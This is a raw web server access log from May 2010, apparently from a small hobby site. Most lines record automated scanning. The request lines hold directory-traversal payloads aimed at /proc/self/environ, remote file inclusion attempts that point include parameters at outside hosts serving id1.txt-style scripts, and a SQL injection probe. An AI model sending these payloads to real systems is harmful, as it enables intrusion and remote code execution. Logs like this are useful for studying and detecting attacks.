213.246.52.14 - - [31/May/2010:22:05:21 -0500] "POST /API_HOME_DIR=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 359 "-""libwww-perl/5.805"
80.249.169.14 - - [31/May/2010:22:05:21 -0500] "GET /API_HOME_DIR=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 359 "-""libwww-perl/5.836"
213.246.52.14 - - [31/May/2010:22:05:40 -0500] "POST /logs/API_HOME_DIR=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 364 "-""libwww-perl/5.805"
213.246.52.14 - - [31/May/2010:22:05:40 -0500] "POST /API_HOME_DIR=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 359 "-""libwww-perl/5.805"
80.249.169.14 - - [31/May/2010:22:05:41 -0500] "GET /logs/API_HOME_DIR=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 364 "-""libwww-perl/5.836"
80.249.169.14 - - [31/May/2010:22:05:41 -0500] "GET /API_HOME_DIR=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 359 "-""libwww-perl/5.836"
64.91.250.11 - - [31/May/2010:22:05:44 -0500] "GET /logs/access_log.1271548800//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
64.91.250.11 - - [31/May/2010:22:05:44 -0500] "GET //technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
64.91.250.11 - - [31/May/2010:22:05:44 -0500] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
66.249.27.162 - - [31/May/2010:22:06:32 -0500] "GET /logs/API_HOME_DIR=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 364 "-""libwww-perl/5.65"
66.249.27.162 - - [31/May/2010:22:06:32 -0500] "GET /API_HOME_DIR=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 359 "-""libwww-perl/5.65"
64.91.250.11 - - [31/May/2010:22:07:18 -0500] "GET //technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
64.91.250.11 - - [31/May/2010:22:07:18 -0500] "GET /logs/access_log.1271548800//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
64.91.250.11 - - [31/May/2010:22:07:18 -0500] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
207.46.13.50 - - [31/May/2010:22:08:56 -0500] "GET /costume/costume1.htm HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
80.249.169.14 - - [31/May/2010:22:09:23 -0500] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.836"
80.249.169.14 - - [31/May/2010:22:09:24 -0500] "GET //index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.836"
200.61.185.200 - - [31/May/2010:22:10:15 -0500] "GET //poll/poll_ssi.php?include_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
200.61.185.200 - - [31/May/2010:22:10:15 -0500] "GET /logs/access_log.1271548800//poll/poll_ssi.php?include_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
200.61.185.200 - - [31/May/2010:22:10:26 -0500] "GET /logs//poll/poll_ssi.php?include_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0"
207.46.195.236 - - [31/May/2010:22:10:28 -0500] "GET /logs/access_log.1206835200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
80.249.169.14 - - [31/May/2010:22:11:31 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.836"
80.249.169.14 - - [31/May/2010:22:11:32 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.836"
213.246.52.14 - - [31/May/2010:22:11:37 -0500] "POST /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
213.246.52.14 - - [31/May/2010:22:11:37 -0500] "POST //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
213.246.52.14 - - [31/May/2010:22:11:39 -0500] "POST /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
213.246.52.14 - - [31/May/2010:22:11:39 -0500] "POST //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
80.249.169.14 - - [31/May/2010:22:14:37 -0500] "GET /logs/index.php?option=com_powermail&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.836"
80.249.169.14 - - [31/May/2010:22:14:38 -0500] "GET /index.php?option=com_powermail&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.836"
80.249.169.14 - - [31/May/2010:22:15:34 -0500] "GET /logs/index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.836"
80.249.169.14 - - [31/May/2010:22:15:34 -0500] "GET /index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.836"
122.112.32.51 - - [31/May/2010:22:15:39 -0500] "GET //citywriter/head.php?path=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 304 "-""Mozilla/5.0"
122.112.32.51 - - [31/May/2010:22:15:39 -0500] "GET /logs/access_log.1271030400//citywriter/head.php?path=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 331 "-""Mozilla/5.0"
122.112.32.51 - - [31/May/2010:22:15:39 -0500] "GET /logs//citywriter/head.php?path=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 309 "-""Mozilla/5.0"
213.246.52.14 - - [31/May/2010:22:15:43 -0500] "POST /logs/index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
213.246.52.14 - - [31/May/2010:22:15:44 -0500] "POST /index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
122.112.32.51 - - [31/May/2010:22:15:45 -0500] "GET /logs/access_log.1270512000//citywriter/head.php?path=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 331 "-""Mozilla/5.0"
213.246.52.14 - - [31/May/2010:22:15:57 -0500] "POST /logs/index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
213.246.52.14 - - [31/May/2010:22:15:57 -0500] "POST /index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
66.249.27.162 - - [31/May/2010:22:16:12 -0500] "GET /logs/index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.65"
66.249.27.162 - - [31/May/2010:22:16:12 -0500] "GET /index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.65"
87.250.255.243 - - [31/May/2010:22:17:11 -0500] "GET /tattoo/links.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
200.61.185.200 - - [31/May/2010:22:17:24 -0500] "GET /logs//index.php?option=com_pcchess&Itemid=S@BUN&page=players&user_id=' HTTP/1.1" 404 299 "-""libwww-perl/5.810"
200.61.185.200 - - [31/May/2010:22:17:27 -0500] "GET //index.php?option=com_pcchess&Itemid=S@BUN&page=players&user_id=' HTTP/1.1" 404 294 "-""libwww-perl/5.810"
76.12.58.212 - - [31/May/2010:22:21:08 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
76.12.58.212 - - [31/May/2010:22:21:28 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
76.12.58.212 - - [31/May/2010:22:21:28 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
67.227.143.132 - - [31/May/2010:22:21:44 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
67.227.143.132 - - [31/May/2010:22:21:57 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
67.227.143.132 - - [31/May/2010:22:21:57 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
174.121.22.5 - - [31/May/2010:22:21:57 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
174.121.22.5 - - [31/May/2010:22:22:02 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
174.121.22.5 - - [31/May/2010:22:22:03 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
213.171.220.16 - - [31/May/2010:22:22:04 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
207.46.13.44 - - [31/May/2010:22:22:24 -0500] "GET /logs/access_log.1263427200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [31/May/2010:22:22:45 -0500] "GET /logs/access_log.1260576000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
94.102.1.206 - - [31/May/2010:22:23:31 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
213.171.220.16 - - [31/May/2010:22:23:49 -0500] "GET /logs/access_log.1273363200/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
213.171.220.16 - - [31/May/2010:22:23:49 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
213.171.220.16 - - [31/May/2010:22:23:49 -0500] "GET /logs/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
213.171.220.16 - - [31/May/2010:22:23:58 -0500] "GET /logs/access_log.1273017600/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
67.195.112.180 - - [31/May/2010:22:25:54 -0500] "GET /logs/access_log.1236038400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
76.12.58.212 - - [31/May/2010:22:27:32 -0500] "GET /logs/access_log.1273363200/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
76.12.58.212 - - [31/May/2010:22:27:32 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
76.12.58.212 - - [31/May/2010:22:27:32 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
67.227.143.132 - - [31/May/2010:22:28:30 -0500] "GET /logs/access_log.1273363200/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
67.227.143.132 - - [31/May/2010:22:28:30 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
67.227.143.132 - - [31/May/2010:22:28:30 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
174.121.22.5 - - [31/May/2010:22:28:43 -0500] "GET /logs/access_log.1273363200/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
174.121.22.5 - - [31/May/2010:22:28:43 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
174.121.22.5 - - [31/May/2010:22:28:43 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
174.121.20.138 - - [31/May/2010:22:28:51 -0500] "GET /logs/access_log.1274832000//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
174.121.20.138 - - [31/May/2010:22:28:52 -0500] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
174.121.20.138 - - [31/May/2010:22:28:52 -0500] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
67.18.167.170 - - [31/May/2010:22:30:54 -0500] "GET /logs/access_log.1274832000/index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
67.18.167.170 - - [31/May/2010:22:30:54 -0500] "GET /index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
67.18.167.170 - - [31/May/2010:22:30:55 -0500] "GET /logs/index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
94.102.1.206 - - [31/May/2010:22:32:10 -0500] "GET /logs/access_log.1273363200/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
94.102.1.206 - - [31/May/2010:22:32:11 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
94.102.1.206 - - [31/May/2010:22:32:11 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
121.190.102.21 - - [31/May/2010:22:34:29 -0500] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
121.190.102.21 - - [31/May/2010:22:34:29 -0500] "GET /logs/access_log.1270771200//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
121.190.102.21 - - [31/May/2010:22:34:30 -0500] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
67.18.167.170 - - [31/May/2010:22:34:40 -0500] "GET /logs/access_log.1274832000/index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
67.18.167.170 - - [31/May/2010:22:34:41 -0500] "GET /index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
67.18.167.170 - - [31/May/2010:22:34:41 -0500] "GET /logs/index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
67.18.167.170 - - [31/May/2010:22:36:19 -0500] "GET /logs/access_log.1274832000/index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
67.18.167.170 - - [31/May/2010:22:36:19 -0500] "GET /index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
67.18.167.170 - - [31/May/2010:22:36:20 -0500] "GET /logs/index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
189.108.172.26 - - [31/May/2010:22:37:35 -0500] "GET /logs/access_log.1274832000//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
189.108.172.26 - - [31/May/2010:22:37:40 -0500] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
189.108.172.26 - - [31/May/2010:22:37:45 -0500] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.808"
121.190.102.21 - - [31/May/2010:22:38:04 -0500] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
121.190.102.21 - - [31/May/2010:22:38:04 -0500] "GET /logs/access_log.1270771200//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
121.190.102.21 - - [31/May/2010:22:38:05 -0500] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
61.8.3.157 - - [31/May/2010:22:39:53 -0500] "GET /logs/access_log.1273363200%20%20/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 359 "-""Mozilla/5.0"
61.8.3.157 - - [31/May/2010:22:39:53 -0500] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
61.8.3.157 - - [31/May/2010:22:39:53 -0500] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
67.195.112.180 - - [31/May/2010:22:41:21 -0500] "GET /logs/access_log.1231200000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
70.55.198.12 - - [31/May/2010:22:42:41 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0 ( .NET CLR 3.5.30729)"
207.46.13.88 - - [31/May/2010:22:44:55 -0500] "GET /logs/access_log.1159315200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.46 - - [31/May/2010:22:45:55 -0500] "GET /logs/access_log.1157414400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
61.8.3.157 - - [31/May/2010:22:47:10 -0500] "GET /logs/access_log.1273363200/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
67.195.112.180 - - [31/May/2010:22:48:07 -0500] "GET /logs/access_log.1202169600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
189.108.172.26 - - [31/May/2010:22:48:43 -0500] "GET /logs/access_log.1274832000//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.808"
189.108.172.26 - - [31/May/2010:22:48:45 -0500] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.808"
189.108.172.26 - - [31/May/2010:22:48:47 -0500] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.808"
114.108.177.125 - - [31/May/2010:22:53:27 -0500] "GET /?option=com_fabrik&controller=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
114.108.177.125 - - [31/May/2010:22:53:28 -0500] "GET /logs/access_log.1273363200%20%20/?option=com_fabrik&controller=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
114.108.177.125 - - [31/May/2010:22:53:29 -0500] "GET /logs/?option=com_fabrik&controller=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 200 7797 "-""Mozilla/5.0"
74.14.231.236 - - [31/May/2010:22:53:30 -0500] "GET /logs//*.php?option=com_peoplebook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 283 "-""libwww-perl/5.805"
74.14.231.236 - - [31/May/2010:22:53:30 -0500] "GET //*.php?option=com_peoplebook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 278 "-""libwww-perl/5.805"
65.55.37.203 - - [31/May/2010:22:54:40 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.37.203 - - [31/May/2010:22:55:31 -0500] "GET /logs/access_log.1183248000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.199.46 - - [31/May/2010:22:56:25 -0500] "GET /logs/access_log.1245888000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [31/May/2010:23:00:30 -0500] "GET /costume/shipping.htm HTTP/1.1" 404 304 "-""Yandex/1.01.001 (compatible; Win16; I)"
114.108.177.125 - - [31/May/2010:23:02:01 -0500] "GET /logs/access_log.1273363200/?option=com_fabrik&controller=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
114.108.177.125 - - [31/May/2010:23:03:10 -0500] "GET /logs/access_log.1274572800/?option=com_fabrik&controller=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
207.46.199.179 - - [31/May/2010:23:06:39 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
220.181.7.41 - - [31/May/2010:23:07:27 -0500] "GET / HTTP/1.1" 200 1003 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
77.221.130.25 - - [31/May/2010:23:08:12 -0500] "GET /logs/access_log.1271548800/index2.php?x=http://www.westbuy.ro/util/id1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
77.221.130.25 - - [31/May/2010:23:08:12 -0500] "GET /index2.php?x=http://www.westbuy.ro/util/id1.txt???? HTTP/1.1" 404 294 "-""Mozilla/5.0"
77.221.130.25 - - [31/May/2010:23:08:12 -0500] "GET /logs/index2.php?x=http://www.westbuy.ro/util/id1.txt???? HTTP/1.1" 404 299 "-""Mozilla/5.0"
77.221.130.25 - - [31/May/2010:23:08:47 -0500] "GET /index2.php?x=http://www.westbuy.ro/util/id1.txt???? HTTP/1.1" 404 294 "-""Mozilla/5.0"
77.221.130.25 - - [31/May/2010:23:08:47 -0500] "GET /logs/access_log.1271548800/index2.php?x=http://www.westbuy.ro/util/id1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
77.221.130.25 - - [31/May/2010:23:08:47 -0500] "GET /logs/index2.php?x=http://www.westbuy.ro/util/id1.txt???? HTTP/1.1" 404 299 "-""Mozilla/5.0"
72.37.150.18 - - [31/May/2010:23:25:50 -0500] "GET /logs//write_update.php?board_skin_path=http://www.sharon.or.kr/data/id1.txt??????? HTTP/1.1" 404 306 "-""Mozilla/5.0"
72.37.150.18 - - [31/May/2010:23:25:50 -0500] "GET /logs/access_log.1271548800//write_update.php?board_skin_path=http://www.sharon.or.kr/data/id1.txt??????? HTTP/1.1" 404 328 "-""Mozilla/5.0"
72.37.150.18 - - [31/May/2010:23:25:51 -0500] "GET //write_update.php?board_skin_path=http://www.sharon.or.kr/data/id1.txt??????? HTTP/1.1" 404 301 "-""Mozilla/5.0"
72.37.150.18 - - [31/May/2010:23:26:12 -0500] "GET /logs/access_log.1271548800//write_update.php?board_skin_path=http://www.sharon.or.kr/data/id1.txt??????? HTTP/1.1" 404 328 "-""Mozilla/5.0"
72.37.150.18 - - [31/May/2010:23:26:12 -0500] "GET /logs//write_update.php?board_skin_path=http://www.sharon.or.kr/data/id1.txt??????? HTTP/1.1" 404 306 "-""Mozilla/5.0"
72.37.150.18 - - [31/May/2010:23:26:12 -0500] "GET //write_update.php?board_skin_path=http://www.sharon.or.kr/data/id1.txt??????? HTTP/1.1" 404 301 "-""Mozilla/5.0"
207.46.204.194 - - [31/May/2010:23:26:26 -0500] "GET /logs/access_log.1254182400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
77.221.130.25 - - [31/May/2010:23:27:06 -0500] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.westbuy.ro/util/id1.txt???? HTTP/1.1" 404 319 "-""Mozilla/5.0"
77.221.130.25 - - [31/May/2010:23:27:06 -0500] "GET /logs/access_log.1271548800//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.westbuy.ro/util/id1.txt???? HTTP/1.1" 404 346 "-""Mozilla/5.0"
77.221.130.25 - - [31/May/2010:23:27:06 -0500] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.westbuy.ro/util/id1.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
207.46.204.238 - - [31/May/2010:23:27:25 -0500] "GET /logs/access_log.1155340800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
77.221.130.25 - - [31/May/2010:23:27:53 -0500] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.westbuy.ro/util/id1.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
